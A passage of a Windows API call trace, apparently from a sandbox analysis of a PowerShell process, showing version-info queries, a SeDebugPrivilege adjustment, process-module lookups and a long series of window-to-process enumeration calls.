	[0442.258] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2ae7570, puLen=0x22e060) returned 1
	[0442.258] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0442.258] CoTaskMemAlloc (cb=0x76) returned 0x3c33f0
	[0442.258] lstrcpyW (in: lpString1=0x3c33f0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0442.258] CoTaskMemFree (pv=0x3c33f0) 
	[0442.258] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2ae760c, puLen=0x22e060) returned 1
	[0442.258] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0442.258] CoTaskMemAlloc (cb=0x44) returned 0x359e80
	[0442.258] lstrcpyW (in: lpString1=0x359e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0442.258] CoTaskMemFree (pv=0x359e80) 
	[0442.258] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2ae7670, puLen=0x22e060) returned 1
	[0442.258] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0442.258] CoTaskMemAlloc (cb=0x58) returned 0x375ac0
	[0442.258] lstrcpyW (in: lpString1=0x375ac0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0442.259] CoTaskMemFree (pv=0x375ac0) 
	[0442.259] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2ae76ec, puLen=0x22e060) returned 1
	[0442.259] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0442.259] CoTaskMemAlloc (cb=0x20) returned 0x4295a0
	[0442.259] lstrcpyW (in: lpString1=0x4295a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0442.259] CoTaskMemFree (pv=0x4295a0) 
	[0442.259] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2ae7394, puLen=0x22e060) returned 1
	[0442.259] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0442.259] CoTaskMemAlloc (cb=0x66) returned 0x39c530
	[0442.259] lstrcpyW (in: lpString1=0x39c530, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0442.259] CoTaskMemFree (pv=0x39c530) 
	[0442.259] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x0, puLen=0x22e060) returned 0
	[0442.259] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x0, puLen=0x22e060) returned 0
	[0442.259] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x0, puLen=0x22e060) returned 0
	[0442.259] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22e038, puLen=0x22e030 | out: lplpBuffer=0x22e038*=0x2ae733c, puLen=0x22e030) returned 1
	[0442.260] CoTaskMemAlloc (cb=0x204) returned 0x3b9dc0
	[0442.260] VerLanguageNameW (in: wLang=0x0, szLang=0x3b9dc0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0442.262] CoTaskMemFree (pv=0x3b9dc0) 
	[0442.262] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\", lplpBuffer=0x22e088, puLen=0x22e080 | out: lplpBuffer=0x22e088*=0x2ae72c8, puLen=0x22e080) returned 1
	[0442.268] GetCurrentProcessId () returned 0xf38
	[0442.861] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x22cfb0 | out: lpLuid=0x22cfb0*(LowPart=0x14, HighPart=0)) returned 1
	[0442.864] GetCurrentProcess () returned 0xffffffffffffffff
	[0442.865] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x22cfd0 | out: TokenHandle=0x22cfd0*=0x2f4) returned 1
	[0442.866] AdjustTokenPrivileges (in: TokenHandle=0x2f4, DisableAllPrivileges=0, NewState=0x2aeab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0442.867] CloseHandle (hObject=0x2f4) returned 1
	[0442.871] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf38) returned 0x2f4
	[0442.880] EnumProcessModules (in: hProcess=0x2f4, lphModule=0x2aeab80, cb=0x200, lpcbNeeded=0x22dfe8 | out: lphModule=0x2aeab80, lpcbNeeded=0x22dfe8) returned 1
	[0442.882] GetModuleInformation (in: hProcess=0x2f4, hModule=0x13f370000, lpmodinfo=0x2aeadf0, cb=0x18 | out: lpmodinfo=0x2aeadf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0442.883] CoTaskMemAlloc (cb=0x804) returned 0x42fd60
	[0442.883] GetModuleBaseNameW (in: hProcess=0x2f4, hModule=0x13f370000, lpBaseName=0x42fd60, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0442.883] CoTaskMemFree (pv=0x42fd60) 
	[0442.884] CoTaskMemAlloc (cb=0x804) returned 0x42fd60
	[0442.884] GetModuleFileNameExW (in: hProcess=0x2f4, hModule=0x13f370000, lpFilename=0x42fd60, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0442.884] CoTaskMemFree (pv=0x42fd60) 
	[0442.885] CloseHandle (hObject=0x2f4) returned 1
	[0442.892] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf38) returned 0x2f4
	[0442.893] GetExitCodeProcess (in: hProcess=0x2f4, lpExitCode=0x22e118 | out: lpExitCode=0x22e118*=0x103) returned 1
	[0442.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12aeb088, Length=0x20000, ResultLength=0x22e0e0 | out: SystemInformation=0x12aeb088, ResultLength=0x22e0e0*=0x29470) returned 0xc0000004
	[0443.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b0b0b8, Length=0x2bc70, ResultLength=0x22e0e0 | out: SystemInformation=0x12b0b0b8, ResultLength=0x22e0e0*=0x29768) returned 0x0
	[0443.167] EnumWindows (lpEnumFunc=0x27c66ac, lParam=0x0) returned 1
	[0443.656] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0444.026] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x558
	[0444.276] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0444.386] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0444.390] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0444.398] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x538
	[0444.402] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0444.447] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x778
	[0444.542] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x778
	[0444.729] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0444.902] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0445.250] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0445.369] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0445.483] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0445.624] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0445.736] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0445.805] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0445.822] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x460
	[0445.914] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0446.039] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0446.134] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1520
	[0446.226] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x14bc
	[0446.274] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf8c
	[0446.351] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe9c
	[0446.398] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1434
	[0446.470] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x14ec
	[0446.538] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xfcc
	[0446.648] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x12ac
	[0446.741] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1484
	[0446.850] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x934
	[0446.928] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc0c
	[0447.100] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb08
	[0447.100] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x948
	[0447.100] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1178
	[0447.100] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x13e0
	[0447.100] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xcd0
	[0447.100] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x13fc
	[0447.101] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xdc8
	[0447.101] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc18
	[0447.101] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc2c
	[0447.101] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa1c
	[0447.101] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1244
	[0447.101] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xdb0
	[0447.101] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1398
	[0447.101] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1358
	[0447.101] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1370
	[0447.101] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1340
	[0447.102] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x130c
	[0447.102] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x12c0
	[0447.102] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x12e4
	[0447.102] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1270
	[0447.102] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1298
	[0447.102] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x120c
	[0447.102] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x122c
	[0447.102] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x11c4
	[0447.102] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x11b0
	[0447.102] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1188
	[0447.102] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1148
	[0447.103] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1160
	[0447.103] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x10fc
	[0447.103] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe34
	[0447.103] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xea4
	[0447.103] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x514
	[0447.103] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe48
	[0447.103] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xbc8
	[0447.103] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xdf8
	[0447.103] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x318
	[0447.103] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xcac
	[0447.104] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x8bc
	[0447.104] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf9c
	[0447.104] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf48
	[0447.104] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe40
	[0447.104] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xecc
	[0447.104] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xeb8
	[0447.104] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe80
	[0447.104] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe98
	[0447.104] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe60
	[0447.104] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xee4
	[0447.104] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf00
	[0447.105] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xdf0
	[0447.105] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe1c
	[0447.105] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xdd0
	[0447.105] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xd94
	[0447.105] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xd74
	[0447.105] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xd00
	[0447.105] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xcd8
	[0447.105] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc84
	[0447.105] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xca4
	[0447.105] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc64
	[0447.105] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc24
	[0447.106] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb84
	[0447.106] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xbac
	[0447.106] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x384
	[0447.106] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xab8
	[0447.106] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x33c
	[0447.106] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa44
	[0447.106] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa64
	[0447.106] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x8a8
	[0447.106] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xaf0
	[0447.106] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x88c
	[0447.107] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb04
	[0447.107] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x910
	[0447.107] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x230
	[0447.107] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xac0
	[0447.107] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xab4
	[0447.107] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xaac
	[0447.107] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x3d0
	[0447.107] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x978
	[0447.107] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa7c
	[0447.107] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x59c
	[0447.107] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa88
	[0447.108] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa6c
	[0447.108] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa68
	[0447.108] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x9f8
	[0447.108] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa04
	[0447.108] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x924
	[0447.108] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x8dc
	[0447.108] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x7dc
	[0447.108] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x768
	[0447.108] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x764
	[0447.108] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x820
	[0447.109] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x810
	[0447.109] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x794
	[0447.109] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x83c
	[0447.109] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x7ac
	[0447.109] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb44
	[0447.109] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb5c
	[0447.109] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x838
	[0447.109] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.109] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.109] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.109] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.110] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.110] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.110] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.110] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.110] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x818
	[0447.110] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x5b8
	[0447.110] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x494
	[0447.110] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1ec
	[0447.110] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x440
	[0447.110] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x7e8
	[0447.110] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x730
	[0447.111] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x2c8
	[0447.111] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x31c
	[0447.111] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x330
	[0447.111] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x128
	[0447.111] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x5c8
